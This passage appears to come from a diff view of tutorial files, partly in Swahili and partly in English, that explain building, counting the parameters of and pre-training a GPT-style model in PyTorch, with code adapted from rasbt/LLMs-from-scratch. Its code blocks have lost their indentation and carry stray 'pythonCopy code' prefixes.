- **Urekebishaji wa Tabaka (`norm1`):** Rekebisha ingizo.
 | 
			
		||||
- **Umakini wa Vichwa Vingi (`att`):** Tumia umakini wa kibinafsi.
 | 
			
		||||
- **Dropout (`drop_shortcut`):** Tumia dropout kwa urekebishaji.
 | 
			
		||||
- **Ongeza Ziada (`x + shortcut`):** Changanya na ingizo la awali.
 | 
			
		||||
2. **Njia ya Pili ya Ziada (FeedForward):**
 | 
			
		||||
- **Ingizo (`shortcut`):** Hifadhi ingizo lililosasishwa kwa muunganisho wa ziada unaofuata.
 | 
			
		||||
- **Urekebishaji wa Tabaka (`norm2`):** Rekebisha ingizo.
 | 
			
		||||
- **Mtandao wa FeedForward (`ff`):** Tumia mabadiliko ya feedforward.
 | 
			
		||||
- **Dropout (`drop_shortcut`):** Tumia dropout.
 | 
			
		||||
- **Ongeza Ziada (`x + shortcut`):** Changanya na ingizo kutoka kwa njia ya kwanza ya ziada.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Block ya transformer inakusanya mitandao yote pamoja na kutumia **urekebishaji** na **dropouts** kuboresha utulivu wa mafunzo na matokeo.\
 | 
			
		||||
> Kumbuka jinsi dropouts zinavyofanywa baada ya matumizi ya kila mtandao wakati urekebishaji unatumika kabla.
 | 
			
		||||
>
 | 
			
		||||
> Zaidi ya hayo, inatumia njia fupi ambazo zinajumuisha **kuongeza matokeo ya mtandao na ingizo lake**. Hii husaidia kuzuia tatizo la gradient inayopotea kwa kuhakikisha kwamba tabaka za mwanzo zinachangia "kiasi" sawa na zile za mwisho.
 | 
			
		||||
 | 
			
		||||
### **GPTModel**
 | 
			
		||||
 | 
			
		||||
_Mifano imeongezwa kama maelezo ili kuelewa vyema mifano ya matrices:_
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class GPTModel(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
 | 
			
		||||
# shape: (vocab_size, emb_dim)
 | 
			
		||||
 | 
			
		||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
 | 
			
		||||
# shape: (context_length, emb_dim)
 | 
			
		||||
 | 
			
		||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
self.trf_blocks = nn.Sequential(
 | 
			
		||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
 | 
			
		||||
)
 | 
			
		||||
# Stack of TransformerBlocks
 | 
			
		||||
 | 
			
		||||
self.final_norm = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
 | 
			
		||||
# shape: (emb_dim, vocab_size)
 | 
			
		||||
 | 
			
		||||
def forward(self, in_idx):
 | 
			
		||||
# in_idx shape: (batch_size, seq_len)
 | 
			
		||||
batch_size, seq_len = in_idx.shape
 | 
			
		||||
 | 
			
		||||
# Token embeddings
 | 
			
		||||
tok_embeds = self.tok_emb(in_idx)
 | 
			
		||||
# shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Positional embeddings
 | 
			
		||||
pos_indices = torch.arange(seq_len, device=in_idx.device)
 | 
			
		||||
# shape: (seq_len,)
 | 
			
		||||
pos_embeds = self.pos_emb(pos_indices)
 | 
			
		||||
# shape: (seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Add token and positional embeddings
 | 
			
		||||
x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
 | 
			
		||||
# x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.drop_emb(x)  # Dropout applied
 | 
			
		||||
# x shape remains: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.trf_blocks(x)  # Pass through Transformer blocks
 | 
			
		||||
# x shape remains: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.final_norm(x)  # Final LayerNorm
 | 
			
		||||
# x shape remains: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
logits = self.out_head(x)  # Project to vocabulary size
 | 
			
		||||
# logits shape: (batch_size, seq_len, vocab_size)
 | 
			
		||||
 | 
			
		||||
return logits  # Output shape: (batch_size, seq_len, vocab_size)
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Tabaka za Kuunganisha:**
 | 
			
		||||
- **Token Embeddings (`tok_emb`):** Hubadilisha viashiria vya token kuwa embeddings. Kama ukumbusho, hizi ni uzito zinazotolewa kwa kila kipimo cha kila token katika msamiati.
 | 
			
		||||
- **Positional Embeddings (`pos_emb`):** Inaongeza taarifa za nafasi kwa embeddings ili kukamata mpangilio wa token. Kama ukumbusho, hizi ni uzito zinazotolewa kwa token kulingana na nafasi yake katika maandiko.
 | 
			
		||||
- **Dropout (`drop_emb`):** Inatumika kwa embeddings kwa ajili ya udhibiti.
 | 
			
		||||
- **Transformer Blocks (`trf_blocks`):** Kifungu cha `n_layers` transformer blocks ili kushughulikia embeddings.
 | 
			
		||||
- **Normalisasi ya Mwisho (`final_norm`):** Normalisasi ya tabaka kabla ya tabaka la matokeo.
 | 
			
		||||
- **Tabaka la Matokeo (`out_head`):** Inatoa hali za mwisho zilizofichwa kwa ukubwa wa msamiati ili kutoa logits kwa ajili ya utabiri.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo la darasa hili ni kutumia mitandao mingine yote iliyotajwa ili **kutabiri token inayofuata katika mfuatano**, ambayo ni muhimu kwa kazi kama vile uzalishaji wa maandiko.
 | 
			
		||||
>
 | 
			
		||||
> Kumbuka jinsi itakavy **tumia blocks za transformer nyingi kadri zilivyoonyeshwa** na kwamba kila block ya transformer inatumia neti moja ya multi-head attestation, neti moja ya feed forward na normalizations kadhaa. Hivyo ikiwa blocks 12 za transformer zinatumika, ongeza hii kwa 12.
 | 
			
		||||
>
 | 
			
		||||
> Zaidi ya hayo, tabaka la **normalisasi** linaongezwa **kabla** ya **matokeo** na tabaka la mwisho la laini linawekwa mwishoni ili kupata matokeo yenye vipimo sahihi. Kumbuka jinsi kila vector ya mwisho ina ukubwa wa msamiati ulio tumika. Hii ni kwa sababu inajaribu kupata uwezekano kwa kila token inayowezekana ndani ya msamiati.
 | 
			
		||||
 | 
			
		||||
## Idadi ya Paramita za kufundisha
 | 
			
		||||
 | 
			
		||||
Ili kuwa na muundo wa GPT uliofafanuliwa, inawezekana kugundua idadi ya paramita za kufundisha:
 | 
			
		||||
```python
 | 
			
		||||
GPT_CONFIG_124M = {
 | 
			
		||||
"vocab_size": 50257,    # Vocabulary size
 | 
			
		||||
"context_length": 1024, # Context length
 | 
			
		||||
"emb_dim": 768,         # Embedding dimension
 | 
			
		||||
"n_heads": 12,          # Number of attention heads
 | 
			
		||||
"n_layers": 12,         # Number of layers
 | 
			
		||||
"drop_rate": 0.1,       # Dropout rate
 | 
			
		||||
"qkv_bias": False       # Query-Key-Value bias
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
total_params = sum(p.numel() for p in model.parameters())
 | 
			
		||||
print(f"Total number of parameters: {total_params:,}")
 | 
			
		||||
# Total number of parameters: 163,009,536
 | 
			
		||||
```
 | 
			
		||||
### **Hatua kwa Hatua Hesabu**
 | 
			
		||||
 | 
			
		||||
#### **1. Tabaka za Kuunganisha: Token Embedding & Position Embedding**
 | 
			
		||||
 | 
			
		||||
- **Tabaka:** `nn.Embedding(vocab_size, emb_dim)`
 | 
			
		||||
- **Vigezo:** `vocab_size * emb_dim`
 | 
			
		||||
```python
 | 
			
		||||
token_embedding_params = 50257 * 768 = 38,597,376
 | 
			
		||||
```
 | 
			
		||||
- **Tabaka:** `nn.Embedding(context_length, emb_dim)`
 | 
			
		||||
- **Vigezo:** `context_length * emb_dim`
 | 
			
		||||
```python
 | 
			
		||||
position_embedding_params = 1024 * 768 = 786,432
 | 
			
		||||
```
 | 
			
		||||
**Jumla ya Vigezo vya Kuunganisha**
 | 
			
		||||
```python
 | 
			
		||||
embedding_params = token_embedding_params + position_embedding_params
 | 
			
		||||
embedding_params = 38,597,376 + 786,432 = 39,383,808
 | 
			
		||||
```
 | 
			
		||||
#### **2. Transformer Blocks**
 | 
			
		||||
 | 
			
		||||
Kuna blocks 12 za transformer, hivyo tutahesabu vigezo kwa block moja kisha kuzidisha kwa 12.
 | 
			
		||||
 | 
			
		||||
**Parameters per Transformer Block**
 | 
			
		||||
 | 
			
		||||
**a. Multi-Head Attention**
 | 
			
		||||
 | 
			
		||||
- **Components:**
 | 
			
		||||
- **Query Linear Layer (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
 | 
			
		||||
- **Key Linear Layer (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
 | 
			
		||||
- **Value Linear Layer (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
 | 
			
		||||
- **Output Projection (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
 | 
			
		||||
- **Calculations:**
 | 
			
		||||
 | 
			
		||||
- **Kila moja ya `W_query`, `W_key`, `W_value`:**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
Kwa kuwa kuna tabaka tatu kama hizo:
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Output Projection (`out_proj`):**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Jumla ya Vigezo vya Multi-Head Attention:**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
mha_params = total_qkv_params + out_proj_params
 | 
			
		||||
mha_params = 1,769,472 + 590,592 = 2,360,064
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
**b. FeedForward Network**
 | 
			
		||||
 | 
			
		||||
- **Components:**
 | 
			
		||||
- **First Linear Layer:** `nn.Linear(emb_dim, 4 * emb_dim)`
 | 
			
		||||
- **Second Linear Layer:** `nn.Linear(4 * emb_dim, emb_dim)`
 | 
			
		||||
- **Calculations:**
 | 
			
		||||
 | 
			
		||||
- **First Linear Layer:**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
 | 
			
		||||
ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Second Linear Layer:**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
 | 
			
		||||
ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Jumla ya Vigezo vya FeedForward:**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
ff_params = ff_first_layer_params + ff_second_layer_params
 | 
			
		||||
ff_params = 2,362,368 + 2,360,064 = 4,722,432
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
**c. Layer Normalizations**
 | 
			
		||||
 | 
			
		||||
- **Components:**
 | 
			
		||||
- Mbili `LayerNorm` instances kwa block.
 | 
			
		||||
- Kila `LayerNorm` ina `2 * emb_dim` parameters (scale na shift).
 | 
			
		||||
- **Calculations:**
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codelayer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
**d. Jumla ya Vigezo kwa Transformer Block**
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block
 | 
			
		||||
params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
 | 
			
		||||
```
 | 
			
		||||
**Jumla ya Vigezo kwa ajili ya Vizui vya Transformer Vyote**
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers
 | 
			
		||||
total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
 | 
			
		||||
```
 | 
			
		||||
#### **3. Tabaka za Mwisho**
 | 
			
		||||
 | 
			
		||||
**a. Kurekebisha Tabaka za Mwisho**
 | 
			
		||||
 | 
			
		||||
- **Parameta:** `2 * emb_dim` (kubwa na kuhamasisha)
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
 | 
			
		||||
```
 | 
			
		||||
**b. Safu ya Utoaji Matokeo (`out_head`)**
 | 
			
		||||
 | 
			
		||||
- **Safu:** `nn.Linear(emb_dim, vocab_size, bias=False)`
 | 
			
		||||
- **Parameta:** `emb_dim * vocab_size`
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
 | 
			
		||||
```
 | 
			
		||||
#### **4. Kuweka Pamoja Vigezo Vyote**
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codetotal_params = (
 | 
			
		||||
embedding_params +
 | 
			
		||||
total_transformer_blocks_params +
 | 
			
		||||
final_layer_norm_params +
 | 
			
		||||
output_projection_params
 | 
			
		||||
)
 | 
			
		||||
total_params = (
 | 
			
		||||
39,383,808 +
 | 
			
		||||
85,026,816 +
 | 
			
		||||
1,536 +
 | 
			
		||||
38,597,376
 | 
			
		||||
)
 | 
			
		||||
total_params = 163,009,536
 | 
			
		||||
```
 | 
			
		||||
## Generate Text
 | 
			
		||||
 | 
			
		||||
Kuwa na mfano unaotabiri token inayofuata kama ile ya awali, inahitajika tu kuchukua thamani za token za mwisho kutoka kwa matokeo (kama zitakuwa zile za token iliyotabiriwa), ambayo itakuwa **thamani kwa kila kipengee katika msamiati** na kisha kutumia kazi ya `softmax` kubadilisha vipimo kuwa uwezekano vinavyos suma 1 na kisha kupata index ya kipengee kikubwa zaidi, ambacho kitakuwa index ya neno ndani ya msamiati.
 | 
			
		||||
 | 
			
		||||
Code from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
def generate_text_simple(model, idx, max_new_tokens, context_size):
 | 
			
		||||
# idx is (batch, n_tokens) array of indices in the current context
 | 
			
		||||
for _ in range(max_new_tokens):
 | 
			
		||||
 | 
			
		||||
# Crop current context if it exceeds the supported context size
 | 
			
		||||
# E.g., if LLM supports only 5 tokens, and the context size is 10
 | 
			
		||||
# then only the last 5 tokens are used as context
 | 
			
		||||
idx_cond = idx[:, -context_size:]
 | 
			
		||||
 | 
			
		||||
# Get the predictions
 | 
			
		||||
with torch.no_grad():
 | 
			
		||||
logits = model(idx_cond)
 | 
			
		||||
 | 
			
		||||
# Focus only on the last time step
 | 
			
		||||
# (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
 | 
			
		||||
logits = logits[:, -1, :]
 | 
			
		||||
 | 
			
		||||
# Apply softmax to get probabilities
 | 
			
		||||
probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)
 | 
			
		||||
 | 
			
		||||
# Get the idx of the vocab entry with the highest probability value
 | 
			
		||||
idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)
 | 
			
		||||
 | 
			
		||||
# Append sampled index to the running sequence
 | 
			
		||||
idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)
 | 
			
		||||
 | 
			
		||||
return idx
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
start_context = "Hello, I am"
 | 
			
		||||
 | 
			
		||||
encoded = tokenizer.encode(start_context)
 | 
			
		||||
print("encoded:", encoded)
 | 
			
		||||
 | 
			
		||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0)
 | 
			
		||||
print("encoded_tensor.shape:", encoded_tensor.shape)
 | 
			
		||||
 | 
			
		||||
model.eval() # disable dropout
 | 
			
		||||
 | 
			
		||||
out = generate_text_simple(
 | 
			
		||||
model=model,
 | 
			
		||||
idx=encoded_tensor,
 | 
			
		||||
max_new_tokens=6,
 | 
			
		||||
context_size=GPT_CONFIG_124M["context_length"]
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
print("Output:", out)
 | 
			
		||||
print("Output length:", len(out[0]))
 | 
			
		||||
```
 | 
			
		||||
## Marejeleo
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,970 +0,0 @@
 | 
			
		||||
# 6. Pre-training & Loading models
 | 
			
		||||
 | 
			
		||||
## Text Generation
 | 
			
		||||
 | 
			
		||||
In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.
 | 
			
		||||
 | 
			
		||||
As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
 | 
			
		||||
 | 
			
		||||
## Text Evaluation
 | 
			
		||||
 | 
			
		||||
In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.
 | 
			
		||||
 | 
			
		||||
In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**.
 | 
			
		||||
 | 
			
		||||
However, instead of working with the raw predictions, it will work with a logarithm with base n. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
 | 
			
		||||
Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, being the first 4 tokens the last one of the input and the fifth the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input the model doesn't know this) with 5 expected token and therefore 5 probabilities to maximize.
 | 
			
		||||
 | 
			
		||||
Therefore, after performing the natural logarithm to each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and thats the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
 | 
			
		||||
For example, a perplexity value of 48725, means that when needed to predict a token it's unsure about which among 48,725 tokens in the vocabulary is the good one.
 | 
			
		||||
 | 
			
		||||
## Pre-Train Example
 | 
			
		||||
 | 
			
		||||
This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb) some times slightly modify
 | 
			
		||||
 | 
			
		||||
<details>
 | 
			
		||||
 | 
			
		||||
<summary>Previous code used here but already explained in previous sections</summary>
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
"""
 | 
			
		||||
This is code explained before so it won't be exaplained
 | 
			
		||||
"""
 | 
			
		||||
 | 
			
		||||
import tiktoken
 | 
			
		||||
import torch
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
from torch.utils.data import Dataset, DataLoader
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class GPTDatasetV1(Dataset):
 | 
			
		||||
    def __init__(self, txt, tokenizer, max_length, stride):
 | 
			
		||||
        self.input_ids = []
 | 
			
		||||
        self.target_ids = []
 | 
			
		||||
 | 
			
		||||
        # Tokenize the entire text
 | 
			
		||||
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
 | 
			
		||||
 | 
			
		||||
        # Use a sliding window to chunk the book into overlapping sequences of max_length
 | 
			
		||||
        for i in range(0, len(token_ids) - max_length, stride):
 | 
			
		||||
            input_chunk = token_ids[i:i + max_length]
 | 
			
		||||
            target_chunk = token_ids[i + 1: i + max_length + 1]
 | 
			
		||||
            self.input_ids.append(torch.tensor(input_chunk))
 | 
			
		||||
            self.target_ids.append(torch.tensor(target_chunk))
 | 
			
		||||
 | 
			
		||||
    def __len__(self):
 | 
			
		||||
        return len(self.input_ids)
 | 
			
		||||
 | 
			
		||||
    def __getitem__(self, idx):
 | 
			
		||||
        return self.input_ids[idx], self.target_ids[idx]
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
 | 
			
		||||
                         stride=128, shuffle=True, drop_last=True, num_workers=0):
 | 
			
		||||
    # Initialize the tokenizer
 | 
			
		||||
    tokenizer = tiktoken.get_encoding("gpt2")
 | 
			
		||||
 | 
			
		||||
    # Create dataset
 | 
			
		||||
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
 | 
			
		||||
 | 
			
		||||
    # Create dataloader
 | 
			
		||||
    dataloader = DataLoader(
 | 
			
		||||
        dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)
 | 
			
		||||
 | 
			
		||||
    return dataloader
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class MultiHeadAttention(nn.Module):
 | 
			
		||||
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
 | 
			
		||||
        super().__init__()
 | 
			
		||||
        assert d_out % num_heads == 0, "d_out must be divisible by n_heads"
 | 
			
		||||
 | 
			
		||||
        self.d_out = d_out
 | 
			
		||||
        self.num_heads = num_heads
 | 
			
		||||
        self.head_dim = d_out // num_heads  # Reduce the projection dim to match desired output dim
 | 
			
		||||
 | 
			
		||||
        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
 | 
			
		||||
        self.dropout = nn.Dropout(dropout)
 | 
			
		||||
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
 | 
			
		||||
 | 
			
		||||
    def forward(self, x):
 | 
			
		||||
        b, num_tokens, d_in = x.shape
 | 
			
		||||
 | 
			
		||||
        keys = self.W_key(x)  # Shape: (b, num_tokens, d_out)
 | 
			
		||||
        queries = self.W_query(x)
 | 
			
		||||
        values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
        # We implicitly split the matrix by adding a `num_heads` dimension
 | 
			
		||||
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
 | 
			
		||||
        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
 | 
			
		||||
        keys = keys.transpose(1, 2)
 | 
			
		||||
        queries = queries.transpose(1, 2)
 | 
			
		||||
        values = values.transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
        # Compute scaled dot-product attention (aka self-attention) with a causal mask
 | 
			
		||||
        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 | 
			
		||||
 | 
			
		||||
        # Original mask truncated to the number of tokens and converted to boolean
 | 
			
		||||
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 | 
			
		||||
 | 
			
		||||
        # Use the mask to fill attention scores
 | 
			
		||||
        attn_scores.masked_fill_(mask_bool, -torch.inf)
 | 
			
		||||
 | 
			
		||||
        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
        attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
        # Shape: (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
        context_vec = (attn_weights @ values).transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
        # Combine heads, where self.d_out = self.num_heads * self.head_dim
 | 
			
		||||
        context_vec = context_vec.reshape(b, num_tokens, self.d_out)
 | 
			
		||||
        context_vec = self.out_proj(context_vec)  # optional projection
 | 
			
		||||
 | 
			
		||||
        return context_vec
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class LayerNorm(nn.Module):
 | 
			
		||||
    def __init__(self, emb_dim):
 | 
			
		||||
        super().__init__()
 | 
			
		||||
        self.eps = 1e-5
 | 
			
		||||
        self.scale = nn.Parameter(torch.ones(emb_dim))
 | 
			
		||||
        self.shift = nn.Parameter(torch.zeros(emb_dim))
 | 
			
		||||
 | 
			
		||||
    def forward(self, x):
 | 
			
		||||
        mean = x.mean(dim=-1, keepdim=True)
 | 
			
		||||
        var = x.var(dim=-1, keepdim=True, unbiased=False)
 | 
			
		||||
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
 | 
			
		||||
        return self.scale * norm_x + self.shift
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class GELU(nn.Module):
 | 
			
		||||
    def __init__(self):
 | 
			
		||||
        super().__init__()
 | 
			
		||||
 | 
			
		||||
    def forward(self, x):
 | 
			
		||||
        return 0.5 * x * (1 + torch.tanh(
 | 
			
		||||
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 | 
			
		||||
            (x + 0.044715 * torch.pow(x, 3))
 | 
			
		||||
        ))
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class FeedForward(nn.Module):
 | 
			
		||||
    def __init__(self, cfg):
 | 
			
		||||
        super().__init__()
 | 
			
		||||
        self.layers = nn.Sequential(
 | 
			
		||||
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
 | 
			
		||||
            GELU(),
 | 
			
		||||
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
 | 
			
		||||
        )
 | 
			
		||||
 | 
			
		||||
    def forward(self, x):
 | 
			
		||||
        return self.layers(x)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class TransformerBlock(nn.Module):
 | 
			
		||||
    def __init__(self, cfg):
 | 
			
		||||
        super().__init__()
 | 
			
		||||
        self.att = MultiHeadAttention(
 | 
			
		||||
            d_in=cfg["emb_dim"],
 | 
			
		||||
            d_out=cfg["emb_dim"],
 | 
			
		||||
            context_length=cfg["context_length"],
 | 
			
		||||
            num_heads=cfg["n_heads"],
 | 
			
		||||
            dropout=cfg["drop_rate"],
 | 
			
		||||
            qkv_bias=cfg["qkv_bias"])
 | 
			
		||||
        self.ff = FeedForward(cfg)
 | 
			
		||||
        self.norm1 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
        self.norm2 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
    def forward(self, x):
 | 
			
		||||
        # Shortcut connection for attention block
 | 
			
		||||
        shortcut = x
 | 
			
		||||
        x = self.norm1(x)
 | 
			
		||||
        x = self.att(x)   # Shape [batch_size, num_tokens, emb_size]
 | 
			
		||||
        x = self.drop_shortcut(x)
 | 
			
		||||
        x = x + shortcut  # Add the original input back
 | 
			
		||||
 | 
			
		||||
        # Shortcut connection for feed-forward block
 | 
			
		||||
        shortcut = x
 | 
			
		||||
        x = self.norm2(x)
 | 
			
		||||
        x = self.ff(x)
 | 
			
		||||
        x = self.drop_shortcut(x)
 | 
			
		||||
        x = x + shortcut  # Add the original input back
 | 
			
		||||
 | 
			
		||||
        return x
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class GPTModel(nn.Module):
 | 
			
		||||
    def __init__(self, cfg):
 | 
			
		||||
        super().__init__()
 | 
			
		||||
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
 | 
			
		||||
        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
 | 
			
		||||
        self.drop_emb = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
        self.trf_blocks = nn.Sequential(
 | 
			
		||||
